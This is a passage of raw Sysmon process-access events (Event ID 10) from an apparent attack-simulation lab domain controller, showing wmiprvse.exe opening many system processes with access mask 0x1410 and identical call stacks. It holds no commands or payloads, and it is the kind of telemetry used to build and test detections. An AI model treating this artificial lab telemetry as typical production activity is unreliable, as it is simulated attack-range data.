:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029881Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029880Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029879Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029878Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029877Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029876Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029875Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029874Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029873Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029872Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029871Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029870Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029869Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029868Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029867Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029866Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029865Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029864Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029863Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029862Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029861Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 